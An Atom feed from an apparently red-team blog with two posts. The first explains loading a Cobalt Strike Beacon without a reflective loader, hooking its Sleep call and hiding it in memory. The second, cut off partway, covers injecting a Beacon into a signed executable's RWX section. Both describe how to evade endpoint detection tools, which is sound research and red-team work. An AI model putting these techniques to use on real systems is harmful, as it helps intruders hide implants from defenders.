<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.2.1">Jekyll</generator><link href="https://www.naksyn.com/atom.xml" rel="self" type="application/atom+xml" /><link href="https://www.naksyn.com/" rel="alternate" type="text/html" /><updated>2024-07-02T05:44:13-04:00</updated><id>https://www.naksyn.com/atom.xml</id><title type="html">Naksyn’s blog</title><subtitle>Red Teaming and offensive stuff</subtitle><author><name>Naksyn</name></author><entry><title type="html">Raising Beacons without UDRLs and Teaching them How to Sleep</title><link href="https://www.naksyn.com/cobalt%20strike/2024/07/02/raising-beacons-without-UDRLs-teaching-how-to-sleep.html" rel="alternate" type="text/html" title="Raising Beacons without UDRLs and Teaching them How to Sleep" /><published>2024-07-02T00:00:00-04:00</published><updated>2024-07-01T17:10:20-04:00</updated><id>https://www.naksyn.com/cobalt%20strike/2024/07/02/raising-beacons-without-UDRLs-teaching-how-to-sleep</id><content type="html" xml:base="https://www.naksyn.com/cobalt%20strike/2024/07/02/raising-beacons-without-UDRLs-teaching-how-to-sleep.html"><![CDATA[<p><img src="/images/pidgeon.png" alt="image-center" title="Technique description" class="align-center" /></p>

<div id="entry-table-of-contents" class="toc-wrapper">
  <h2 id="toc-toggle" class="no_toc">
  Table of Contents <i class="toc-toggle-icon fas fa-chevron-down"></i>
</h2>
<ol id="markdown-toc">
  <li><a href="#tldr" id="markdown-toc-tldr">TL;DR</a></li>
  <li><a href="#intro" id="markdown-toc-intro">Intro</a></li>
  <li><a href="#udrl-less-beacon-generation" id="markdown-toc-udrl-less-beacon-generation">UDRL-less Beacon generation</a></li>
  <li><a href="#udrl-less-beacon-loading" id="markdown-toc-udrl-less-beacon-loading">UDRL-less Beacon loading</a></li>
  <li><a href="#hook-sleep-and-prototype-stuff" id="markdown-toc-hook-sleep-and-prototype-stuff">Hook Sleep and prototype stuff</a>    <ol>
      <li><a href="#poc--gtfo-1" id="markdown-toc-poc--gtfo-1">PoC || GTFO #1</a></li>
    </ol>
  </li>
  <li><a href="#memmory-bouncing" id="markdown-toc-memmory-bouncing">Memmory Bouncing</a>    <ol>
      <li><a href="#poc--gtfo-2" id="markdown-toc-poc--gtfo-2">PoC || GTFO #2</a></li>
    </ol>
  </li>
  <li><a href="#memory-hopping" id="markdown-toc-memory-hopping">Memory Hopping</a>    <ol>
      <li><a href="#poc--gtfo-3" id="markdown-toc-poc--gtfo-3">PoC || GTFO #3</a></li>
    </ol>
  </li>
  <li><a href="#outro" id="markdown-toc-outro">Outro</a></li>
</ol>

</div>

<h3 id="tldr">TL;DR</h3>

<p>This journey started because I wanted to a simpler way than Beacon UDRL to experiment with sleep obfuscation techniques.</p>

<p>It turned out that by creating a raw UDRL-less Cobalt Strike Beacon, using a specific cna script, one could use a generic PE loader to execute it by calling the EntryPoint twice and using an undocumented DllMain execution path triggered with a specific dwReason value in the second call.</p>

<p>This allowed a direct IAT Sleep hook on the Beacon and a quicker way to prototye two techniques, dubbed <strong>MemoryBouncing</strong> and  <strong>MemoryHopping</strong> ,to overcome Elastic <a href="https://github.com/jdu2600/EtwTi-FluctuationMonitor">EtwTI-FluctuationMonitor</a> tool that bakes a detection for sleep obfuscation techniques that change permissions from RX to RW routinely.</p>

<p>MemoryBouncing is a Sleep obfuscation technique that avoids RX -&gt; RW detection by saving an encrypted copy of the PE, freeing the PE memory while sleeping and allocating it again as RWX before resuming execution.
This technique allowed to operate an UDRL-less Beacon being undetected by the tools <a href="https://github.com/jdu2600/EtwTi-FluctuationMonitor">EtwTI-FluctuationMonitor</a>, <a href="https://github.com/jdu2600/CFG-FindHiddenShellcode">CFG-FindHiddenShellcode</a>, <a href="https://github.com/forrest-orr/moneta">Moneta</a> and the latest release (to date) of <a href="https://github.com/hasherezade/pe-sieve">PE-Sieve</a> with aggressive scan options.</p>

<p>MemoryHopping technique allocates RWX memory always in a different address, requiring the adjustment of the return address and remapping and relocating the PE at each hooked sleep call.
Using this technique one must avoid having cross memory references in the payload otherwise an execution exception will be generated after the memory hop because the memory address referenced has been freed.</p>

<p>The PoC for the techniques are included in the <a href="https://github.com/naksyn/DojoLoader">DojoLoader</a> project available on my GitHub and can be useful to quickly prototype and test Sleep obfuscation techniques.</p>

<h3 id="intro">Intro</h3>

<p>UDRLs with Beacon are very powerful and allow for the smallest memory footprint for the running Beacon. However, they come with some disadvantages: development is more complex since UDRLs require Position Independent Code, and debugging can be so challenging it might feel like it ages you decades.
Starting from Cobalt Strike 4.9.1 a new feature that allows Beacon to be exported without UDRL has been released, however, <a href="https://www.cobaltstrike.com/blog/cobalt-strike-49-take-me-to-your-loader">in this blogpost</a> one can read:
<strong>“[this feature brings] the ability to export Beacon without a reflective loader which adds official support for prepend-style UDRLs”.</strong></p>

<p class="notice--warning"><strong>What about non-prepend style UDRLs like a generic PE loader?</strong></p>
<p>Even though I might not get official support for generic PE loaders (why not though?) and given that UDRLs are better operational tools, it sounded a nice capability to have at hand.</p>

<p>As per my current understanding, following are the pros and cons of using UDRLs and generic PE loaders to load a Beacon:</p>

<p>UDRLs:</p>
<ul>
  <li>PRO: Smallest malicious memory footprint - all malicious code can be encrypted</li>
  <li>PRO: Best usage for process injection (shellcode blob one can just execute)</li>
  <li>CON: increased development complexity</li>
  <li>CON: increased debugging complexity</li>
  <li>CON: size constraints</li>
  <li>CON: reliance on dedicated thread to execute Beacon, asynchronous calls and timer queues to perform sleep obfuscation operations.</li>
</ul>

<p>Generic PE Loaders:</p>
<ul>
  <li>PRO: Simplified development and debugging</li>
  <li>PRO: can do a broader range of sleep obfuscation operations because the loader can access Beacon’s memory directly.</li>
  <li>PRO: no size limit</li>
  <li>PRO: can avoid creating new thread to run the beacon</li>
  <li>CON: Bigger malicious memory footprint - Beacon can be encrypted but PE loading code cannot be encrypted as easily</li>
  <li>CON: far less suitable for injection than shellcode</li>
</ul>

<p>The higher number of PROs for PE loaders does not mean they are better for stealth operations than UDRLs, but PE loaders can still have use cases.</p>

<p>To my knowledge, before Cobalt Strike version 4.9.1 it wasn’t possible to export a Beacon without bringing its own stock loader. This means that the “Stageless Windows Payload” generated in raw format is essentially a dll that will in turn load beacon once executed. We’ll refer to that as “stock raw beacon payload” within this blogpost.
Loading the stock raw beacon payload leaves lots of artifacts in memory: (see picture below), and one way to avoid that is to use custom UDRLs.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/stock_beacon_moneta.png" alt="image-center" title="some artifacts left by a stock Beacon" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Moneta output for a stock beacon</em></td>
    </tr>
  </tbody>
</table>

<p>Indeed, UDRLs allow to get rid of the stock loader and allow also dynamic IAT hooking to do sleep obfuscation and other evasive techniques, without using the SleepMask.</p>

<p>Doing dynamic IAT hooking while loading the stock raw Beacon payload <strong>will not hook the sleep API of the real Beacon</strong>, because its imports will be resolved by the “internal” loader embedded in the dll, not by the loader that you will use to inject the stock beacon dll.
This is an issue described in the <a href="https://github.com/mgeeky/ShellcodeFluctuation">shellcode fluctuation project</a> by Mariusz Banach (mgeeky), where he had to hook the Sleep API in the kernel32.dll, instead of doing it dynamically, to effectively intercept the Beacon sleep calls while hitting kernel32.dll.</p>

<p>However, after version 4.9.1 one could export a Beacon without UDRL, get rid of the stock loader artifacts left in memory and dynamically hook the APIs exported by the raw Beacon e.g. to implement obfuscation without a SleepMask.
We can also avoid creating a new thread and live onto the main loader’s thread.</p>

<h3 id="udrl-less-beacon-generation">UDRL-less Beacon generation</h3>

<p>I won’t try to explain how URDLs works since there are amazing blog posts available <a href="https://securityintelligence.com/x-force/defining-cobalt-strike-reflective-loader/">here</a> and <a href="https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-1-simplifying-development">here</a>, 
so please have a look at them if you need a refresher.
Essentially, I needed to use a Beacon that is not “wrapped” by an UDRL so that I can directly hook API calls from the payload after having it mapped in memory.
I couldn’t make the cna snippet from <a href="https://www.cobaltstrike.com/blog/cobalt-strike-49-take-me-to-your-loader">Fortra blogpost</a> work to generate an UDRL-less Beacon, so after a bit of sifting through Cobalt Strike documentation and some fails I came up with this CNA:</p>

<pre><code class="language-sleep"># ------------------------------------ 
# $1 = DLLfilename 
# $2 = arch 
# ------------------------------------ 
 
set BEACON_RDLL_SIZE { 
    warn("Running 'BEACON_RDLL_SIZE' for DLL " .$1. " with architecture " .$2);    
    return "0"; 
}

set BEACON_RDLL_GENERATE {
    local('$arch $beacon $fileHandle $ldr $path $payload');
    $beacon = $2;
    $arch = $3;

    # Apply the transformations to the beacon payload
    $beacon = setup_transformations($beacon, $arch);
	
    return $beacon;
    }
</code></pre>

<p>After loading this CNA and generating a payload (Payloads -&gt; Windows Stageless Payloads -&gt; Output:Raw) we can see the differences in the stock payload in the following figures:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/stock_Beacon_cff.png" alt="image-center" title="Stock Beacon payload generated without noRL CNA" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>stageless stock Beacon payload generated without cna</em></td>
    </tr>
  </tbody>
</table>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/Beacon_noRL_cff.png" alt="image-center" title="Beacon without UDRL" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>imports of a Beacon without UDRL</em></td>
    </tr>
  </tbody>
</table>

<p>We can see that the stock beacon payload isn’t even parsed as a valid PE because it essentially is a blob of position independent code that initializes and runs the Beacon payload.
On the other hand, the payload generated with our CNA script gives us a valid PE with some interesting imports such as WinHTTP. 
Indeed, WinHTTP is the library chosen as HTTP library during payload generation, and the fact that it’s included as an import entry is a sign that we are dealing with the unwrapped (by UDRL) Beacon payload.</p>

<h3 id="udrl-less-beacon-loading">UDRL-less Beacon loading</h3>

<p>After initially failing to load the UDRL-less Beacon payload for no apparent valid reason I began investigating what was going on. What I found is that there are essentially two different execution paths that are triggered by calling the dll entrypoint with <code class="language-plaintext highlighter-rouge">fdwReason</code> value 1 (DLL_PROCESS_ATTACH) and 4.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/noRL_dllmain_paths.png" alt="image-center" title="DllMain execution paths" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>UDRL-less Beacon Dllmain execution paths</em></td>
    </tr>
  </tbody>
</table>

<p>The execution branches that the flow will take if using <code class="language-plaintext highlighter-rouge">fdwReason</code> 1 or 4, lead to subroutines starting at address <code class="language-plaintext highlighter-rouge">0x1800CA74</code> and <code class="language-plaintext highlighter-rouge">0x18001A580</code> respectively.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/fdwReason_paths.png" alt="image-center" title="different subroutines called if different fdwReason value is used" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>different subroutines called if different fdwReason value is used</em></td>
    </tr>
  </tbody>
</table>

<p>It’s clear now that the UDRL-less Beacon should be loaded by calling the entrypoing using fdwReason 1 <strong>and</strong> 4, but in which order? And what are the subroutine doing actuallly?</p>

<p>After some debugging I found that the subroutine starting at <code class="language-plaintext highlighter-rouge">0x1800CA74</code> is responsible for single-byte xoring of the 0x1800 bytes of Beacon configs</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/beacon_configs_xor.png" alt="image-center" title="xor cycle applied to 0x1800 bytes configuration" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>subroutine responsible for config singlebyte-xoring called after using fdwReason 1</em></td>
    </tr>
  </tbody>
</table>

<p>On the other hand, the subroutine starting at <code class="language-plaintext highlighter-rouge">0x18001A580</code> contains a function block at <code class="language-plaintext highlighter-rouge">0x18000CD44</code> that gets hit after the sleeptime to reach the C2 set in the malleable profile.
This subroutine uses some of the cleartext configuration parameters after the single-byte xor has been applied by the subroutine at <code class="language-plaintext highlighter-rouge">0x1800CA74</code>.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/bacon_noRL_polling.png" alt="image-center" title="C2 polling routine" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>one of the subroutines responsible for C2 polling</em></td>
    </tr>
  </tbody>
</table>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/beacon_noRL_polling_configs.png" alt="image-center" title="Beacon decrypted configs used in the routine" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Decrypted Beacon configs used in the routine at address 0x18000CD44</em></td>
    </tr>
  </tbody>
</table>

<p>It is now clear that in order to successfully load a UDRL-less Beacon we should call the <code class="language-plaintext highlighter-rouge">Dllmain</code> entrypoint such that the configuration gets decrypted (<code class="language-plaintext highlighter-rouge">fdwReason</code> 1) and subsequently used to poll the C2 (<code class="language-plaintext highlighter-rouge">fdwReason</code> 4).
Including this logic in a generic PE loader that uses MemoryModule to map the dll in memory and execute it, will allow us to map the UDRL-Less Beacon payload.</p>

<h3 id="hook-sleep-and-prototype-stuff">Hook Sleep and prototype stuff</h3>

<p>In order to load a UDRL-less Beacon I created the project <a href="https://github.com/naksyn/DojoLoader">DojoLoader</a>, it is a generic PE loader that you can use also to prototype with sleep obfuscation as covered later in the post.</p>

<p>Dojoloader uses the MemoryModule implementation of the <a href="https://gitlab.com/ORCA000/dynamicdllloader">DynamicDllLoader project by ORCA000</a>, I added modularity and some features like:</p>

<ol>
  <li>download and execution of (xored) shellcode from HTTP</li>
  <li>dynamic IAT hooking for Sleep function</li>
  <li>three different Sleep obfuscation techinques implemented in the hook library</li>
</ol>

<p>Executing a UDRL-less beacon by itself is not very useful if you’re not trying to hide a little bit. 
However, we are now resolving dynamically the imports of a UDRL-less beacon so we can hook the Sleep function used by the Beacon and apply our obfuscation techniques.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">PIMAGE_IMPORT_BY_NAME</span> <span class="n">thunkData</span> <span class="o">=</span> <span class="n">MakePointer</span><span class="p">(</span><span class="n">PIMAGE_IMPORT_BY_NAME</span><span class="p">,</span> <span class="n">pMemModule</span><span class="o">-&gt;</span><span class="n">lpBase</span><span class="p">,</span> <span class="p">(</span><span class="o">*</span><span class="n">thunkRef</span><span class="p">));</span>
                <span class="o">*</span><span class="n">funcRef</span> <span class="o">=</span> <span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hMod</span><span class="p">,</span> <span class="p">(</span><span class="n">LPCSTR</span><span class="p">)</span><span class="o">&amp;</span><span class="n">thunkData</span><span class="o">-&gt;</span><span class="n">Name</span><span class="p">);</span>
                <span class="n">printf</span><span class="p">(</span><span class="s">"[+] Function Name: %s, Address: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">thunkData</span><span class="o">-&gt;</span><span class="n">Name</span><span class="p">,</span> <span class="o">*</span><span class="n">funcRef</span><span class="p">);</span>

                <span class="c1">// Check if the function should be hooked</span>
				<span class="k">if</span> <span class="p">(</span><span class="n">Configs</span><span class="p">.</span><span class="n">SleepHookFunc</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
                    <span class="k">if</span> <span class="p">(</span><span class="n">check_hook</span><span class="p">((</span><span class="n">LPCSTR</span><span class="p">)</span><span class="o">&amp;</span><span class="n">thunkData</span><span class="o">-&gt;</span><span class="n">Name</span><span class="p">))</span> <span class="p">{</span>
                        <span class="n">printf</span><span class="p">(</span><span class="s">"[+] Hooking function: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">thunkData</span><span class="o">-&gt;</span><span class="n">Name</span><span class="p">);</span>
                        <span class="o">*</span><span class="n">funcRef</span> <span class="o">=</span> <span class="n">Configs</span><span class="p">.</span><span class="n">SleepHookFunc</span><span class="p">;</span>
                    <span class="p">}</span>
</code></pre></div></div>

<p>After applying a simple <em>RW -&gt; encrypt -&gt; Sleep -&gt; decrypt -&gt; RX</em> scheme as our sleep obfuscation we should have no artifacts shown by Moneta.
Indeed, Moneta is not alerting on memory anomalies, however, this “old” technique cannot get past the latest PE-Sieve and EtwTI-FluctuationMonitor</p>

<h4 id="poc--gtfo-1">PoC || GTFO #1</h4>

<p>Here’s a video using Dojoloader to load an UDRL-less Beacon payload, hooking Sleep and applying a <em>RW -&gt; encrypt -&gt; Sleep -&gt; decrypt -&gt; RX</em> sleep obfuscation scheme:</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/RWRX.mp4" type="video/mp4" />
</video>

<h3 id="memmory-bouncing">Memmory Bouncing</h3>

<p>I find DojoLoader useful to prototype and test sleep obfuscation techniques directly on a UDRL-less beacon so I thought about couple ways to circumvent EtwTI-FluctuationMonitor and CFG-FindHiddenShellcode.</p>

<p>John Uhlmann (<a href="https://twitter.com/jdu2600">@jdu2600</a>) in its <a href="https://www.youtube.com/watch?v=WpzVhCOcIAc">Black Hat Asia presentation</a> hinted that one could potentially jump at a new location at every time to circumvent the EtwTI-FluctuationMonitor detection. 
<a href="www.x.com/shubakki">@shubakki</a> in its <a href="https://sillywa.re/posts/flower-da-flowin-shc/">blogpost</a> also describe a clever way to circumvent the detection by behaving like properly JIT memory <em>Allocate(RW) -&gt; memcpy(code) -&gt; Protect(RX) -&gt; execute [-&gt; Free]</em></p>

<p>To me, one of the simplest Sleep hook function that could avoid the RX -&gt; RW detection does the following:</p>

<ol>
  <li>Copy mapped PE to a buffer and encrypt it</li>
  <li>Free mapped PE address</li>
  <li>do sleep time (e.g. SleepEx)</li>
  <li>Allocate RWX address on the same address were PE was mapped</li>
  <li>decrypt the buffer and copy it over the RWX memory</li>
</ol>

<p>I like to call this technique <strong>MemoryBouncing</strong> and although it might not be the stealthiest chain because of the RWX allocation, it avoids using VirtualProtect altogether, so YMMV.
Interestingly, This technique allowed to operate an UDRL-less Beacon undetected by the tools EtwTI-FluctuationMonitor, CFG-FindHiddenShellcode, Moneta and the latest release (to date) of PE-Sieve with aggressive scan options.
Even though DojoLoader does not include (still) stack spoofing techniques, the stack address would point to an invalid address if inspected during sleeping, because the PE memory has been freed.</p>

<h4 id="poc--gtfo-2">PoC || GTFO #2</h4>

<p>Here’s a video showing MemoryBouncing using an UDRL-less Beacon payload against EtwTI-FluctuationMonitor and CFG-FindHiddenShellcode (the scan was pretty lengthy):</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/membounce.mp4" type="video/mp4" />
</video>

<h3 id="memory-hopping">Memory Hopping</h3>

<p>Another approach to circumvent RX -&gt; RW detection would be, as <a href="https://twitter.com/jdu2600">@jdu2600</a> hinted in his presentation, to allocate RWX always on a different address, but in this case there are some things to take into consideration:</p>

<ol>
  <li>since we’re not dealing with shellcode or PIC, PE relocations need to be calculated at each change of memory</li>
  <li>the return address needs also to be adjusted at each change.</li>
  <li>payload memory allocations would need to be hooked and deal with the issues of always moving in memory (broken pointer references) or use a payload that is natively compatible with this technique.</li>
</ol>

<p>After the hook is hit this technique will perform the following steps:</p>

<ol>
  <li>save the return address</li>
  <li>copy the mapped PE bytes to a buffer and optionally encrypt it</li>
  <li>Free the memory of the mapped payload</li>
  <li>allocate RWX memory on a different address</li>
  <li>calculate delta and adjust the return address accordingly</li>
  <li>copy bytes from the buffer to the newly created memory region</li>
  <li>perform relocations on the copied bytes</li>
  <li>resume execution form the adjusted return address</li>
</ol>

<h4 id="poc--gtfo-3">PoC || GTFO #3</h4>

<p>I dubbed this technique <em>MemoryHopping</em> and as a PoC I used a test program that connects via socket, prints via stdout and sleeps. 
 In the following video we can see how DojoLoader is hooking the Sleep function and remapping the PE at a new address (linearly incremented) every time the hook it’s hit, properly adjusting the return address before resuming execution.</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/memhop.mp4" type="video/mp4" />
</video>

<h3 id="outro">Outro</h3>

<p>RX-&gt;RW detections can detect a wide range of sleep obfuscation techniques and attackers need to find more creative ways to hide a beacon in memory while sleeping. 
This post described an attempt in that direction using a PE generic loader to quickly prototype and test ideas that can then be further improved and engineered if deemed worthy.</p>]]></content><author><name>Naksyn</name></author><category term="Cobalt Strike" /><category term="evasion" /><category term="redteam" /><category term="injection" /><summary type="html"><![CDATA[UDRLs and prepended loaders aren't the only way to execute a raw payload and get a direct hooking in place. In the case of Cobalt Strike, a generic PE loader can be tweaked to execute an UDRL-less Beacon and get direct hooking for an easier prototyping of Sleep obfuscation techniques. Using this approach, two techniques that bypasses the Elastic's RX -> RW Sleep detection, along with few other scanners, are then demonstrated.]]></summary></entry><entry><title type="html">Mockingjay revisisted - Process stomping and loading beacon with sRDI</title><link href="https://www.naksyn.com/edr%20evasion/2023/11/18/mockingjay-revisited-process-stomping-srdi-beacon.html" rel="alternate" type="text/html" title="Mockingjay revisisted - Process stomping and loading beacon with sRDI" /><published>2023-11-18T00:00:00-05:00</published><updated>2023-06-03T17:10:20-04:00</updated><id>https://www.naksyn.com/edr%20evasion/2023/11/18/mockingjay-revisited-process-stomping-srdi-beacon</id><content type="html" xml:base="https://www.naksyn.com/edr%20evasion/2023/11/18/mockingjay-revisited-process-stomping-srdi-beacon.html"><![CDATA[<p><img src="/images/monkeyjay.PNG" alt="image-center" title="Mojo Monkeyjay" class="align-center" /></p>

<div id="entry-table-of-contents" class="toc-wrapper">
  <h2 id="toc-toggle" class="no_toc">
  Table of Contents <i class="toc-toggle-icon fas fa-chevron-down"></i>
</h2>
<ol id="markdown-toc">
  <li><a href="#tldr" id="markdown-toc-tldr">TL;DR</a></li>
  <li><a href="#credits" id="markdown-toc-credits">Credits</a></li>
  <li><a href="#intro" id="markdown-toc-intro">Intro</a></li>
  <li><a href="#process-stomping" id="markdown-toc-process-stomping">Process Stomping</a></li>
  <li><a href="#using-srdi-to-load-a-beacon-on-an-rwx-process-section" id="markdown-toc-using-srdi-to-load-a-beacon-on-an-rwx-process-section">using sRDI to load a Beacon on an RWX process’ section</a></li>
  <li><a href="#putting-it-all-together-srdi--reflective-loaderless-beacon--process-stomping" id="markdown-toc-putting-it-all-together-srdi--reflective-loaderless-beacon--process-stomping">Putting it all together: sRDI — Reflective-Loaderless Beacon — Process Stomping</a></li>
  <li><a href="#outro" id="markdown-toc-outro">Outro</a></li>
</ol>

</div>

<h3 id="tldr">TL;DR</h3>

<p><a href="https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution">Original Mockingjay technique</a> abuses dll with RWX sections to obtain a stealthier way to inject malicious code, basically by avoiding the creation of dynamic memory allocation and avoiding the usage of virtualprotect, since RWX is already what we need.
The same reasoning can be applied also to executables with RWX sections because we can:</p>

<ol>
  <li>start the executable in a suspended state.</li>
  <li>write some shellcode on the RWX section.</li>
  <li>resume the thread on the desired entry point.</li>
</ol>

<p>This technique, dubbed Process Stomping, is a variation of hasherezade’s <a href="https://github.com/hasherezade/process_overwriting">Process Overwriting</a> and it has the advantage of writing a shellcode payload on a targeted section instead of writing a whole PE payload over the hosting process address space.</p>

<p>We fell in love with DoublePulsar in 2017 so we wanted to use sRDI with a Reflective-Loaderless payload as shellcode. 
For this reason we used the recent <a href="https://www.cobaltstrike.com/blog/cobalt-strike-49-take-me-to-your-loader">Cobalt Strike 4.9 feature</a> that allow the generation of a Beacon without a reflective loader and we modified the <a href="https://github.com/monoxgas/sRDI">sRDI</a> project to generate shellcode that will in turn bootstrap the reflective loading of Beacon <strong>on the RWX region of the stomped executable</strong>.</p>

<p>We tested the injection on a GlassWire executable (x86) that has a section called .themida with RWX permissions and as a final result we got the process running with an injected beacon living in the RWX memory range.
This was not a vulnerability on GlassWire side given the fact that every executable with RWX permissions and enough space to host a Beacon would be a good fit.</p>

<p>The technique’s PoC <a href="https://github.com/naksyn/ProcessStomping">can be found on my github</a> , along with the lightly adapted sRDI project used.</p>

<h3 id="credits">Credits</h3>

<p>A huge thank you to:</p>
<ul>
  <li>Aleksandra Doniec (@hasherezade) for <a href="https://github.com/hasherezade/process_overwriting">Process Overwriting</a></li>
  <li>Nick Landers for <a href="https://github.com/monoxgas/sRDI">sRDI</a></li>
</ul>

<h3 id="intro">Intro</h3>

<p>Poking around with Moneta I stumbled upon a strange behaviour held by <a href="https://www.glasswire.com/">GlassWire</a> that I often use because I find it very useful to spot anomalies and infections.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/glasswire_moneta.png" alt="image-center" title="GlassWire x86 executable" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Moneta output for GlassWire executable</em></td>
    </tr>
  </tbody>
</table>

<p>As can be seen on the picture, GlassWire executable has a section named .themida, that immediately recalled the famous <a href="https://www.oreans.com/Themida.php">packer</a>.
The section has a size of around 7600 kB and RWX permissions.</p>

<p class="notice--info"><strong>The key element here is that Moneta is alerting “modified code” for the .themida section for the entirety of its size. This is intended behaviour for packers and alike, since packed binaries while on disk and packed, have totally different content when unpacked in memory.</strong></p>

<p>This would be a perfect spot to hide in, since Moneta will alert this exact same behaviour on every GlassWire binary.
Notably, there’s also a 64 kB RWX private commit and as a cherry on top, the executable is 32 bit and signed.
Double-checking with ProcessHacker and PEBear confirmed the finding.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/PH_glasswire.png" alt="image-center" title="ProcessHacker Memory view for GlassWire executable" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>ProcessHacker Memory view for GlassWire executable</em></td>
    </tr>
  </tbody>
</table>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/pebear_glasswire.png" alt="image-center" title="PEbear section view for GlassWire executable" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>PEbear section view for GlassWire executable</em></td>
    </tr>
  </tbody>
</table>

<p>While looking at these interesting characteristics, <a href="https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution">Mockingjay</a> injection technique immediately came to mind. However, it originally aimed at writing malicious code onto a dll with RWX permissions, not onto a running process’ section.
So we decided to investigate if the same Mockingjay principle could be applied also to executables and we wanted to <strong>load a beacon onto the mapped RWX section itself</strong>, instead of allocating dynamic memory.
This post documents the journey to achieve the aforementioned outcome.</p>

<h3 id="process-stomping">Process Stomping</h3>

<p>One common way of writing malicious code onto a section’s process is to use some variations of Process Hollowing technique. 
As a refresher, Process Hollowing uses the following Windows APIs:</p>

<ol>
  <li><strong>CreateProcess</strong> - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the processes primary thread.</li>
  <li><strong>ZwUnmapViewOfSection or NtUnmapViewOfSection</strong> - used to unmap the process memory. These two APIs basically release all memory pointed to by a section.</li>
  <li><strong>VirtualAllocEx</strong> - used to allocate new memory for malicious code to be written.</li>
  <li><strong>WriteProcessMemory</strong> - used to write each malicious code to the target process space.</li>
  <li><strong>SetThreadContext</strong> - used to point the entrypoint to a new code section that it has written.</li>
  <li><strong>ResumeThread</strong> - self-explanatory.</li>
</ol>

<p>Process Hollowing has been pretty popular among malware authors for quite a while, in the meantime, some variations of this technique have been published.
One notable variation is called <a href="https://github.com/hasherezade/process_overwriting">Process Overwriting</a> and it avoids the step 2 and 3 by writing the malicious PE over the hosting process memory space (started in step 1).
This is how an implanted PE looks like in memory (the host process is calc.exe).</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/process_overwriting_hasherezade.png" alt="image-center" title="Process Overwriting" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Proocess Overwriting injected PE - taken from hasherezade’s github repository</em></td>
    </tr>
  </tbody>
</table>

<p>This is nearly everything we need, except for the fact that we would need to write some shellcode over a specific section and not a PE over the whole hosting process address space right from the base address.</p>

<p>Quite similarly to the Module Stomping counterpart, our aim in Process Stomping is to write some shellcode onto a specific section of a target process that we started in a suspended state.
For the purpose of this blogpost, the section will be the one with RWX permissions (.themida in the GlassWire executable) so that we can exploit the generous permissions and the likelihood of being in a quite popular false positive situation for GlassWire.</p>

<p>These are the main steps of the ProcessStomping technique:</p>

<ol>
  <li><strong>CreateProcess</strong> - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the processes primary thread.</li>
  <li><strong>WriteProcessMemory</strong> - used to write each malicious shellcode to the target process section.</li>
  <li><strong>SetThreadContext</strong> - used to point the entrypoint to a new code section that it has written.</li>
  <li><strong>ResumeThread</strong> - self-explanatory.</li>
</ol>

<p>The main difference between the existing ProcessOverwriting technique and ProcessStomping is that the former writes the target process’ memory space starting from the top of it, with a PE, on the other hand, ProcessStomping is used to write shellcode only onto a specific section of the target process.
We can then add a bit more juice by asking ourself this question:</p>

<p class="notice--warning"><strong>It’s a waste of an opportunity to stomp on an executable with a native RWX section using some shellcode that will then dynamically allocate our payload. Why not let our payload live within the RWX section instead?</strong></p>

<h3 id="using-srdi-to-load-a-beacon-on-an-rwx-process-section">using sRDI to load a Beacon on an RWX process’ section</h3>

<p>In order to reach our objective and make our payload live into the RWX section of the target process that we want to stomp, we can combine the new <a href="https://www.cobaltstrike.com/blog/cobalt-strike-49-take-me-to-your-loader">Cobalt Strike 4.9 feature</a> of exporting Beacon without a Reflective Loader and using <a href="https://github.com/monoxgas/sRDI">sRDI</a> project as a prepended loader for Beacon.
For those unfamiliar with sRDI, it can essentially be seen as a tool that turns dlls into position independent shellcode also on the fly.</p>

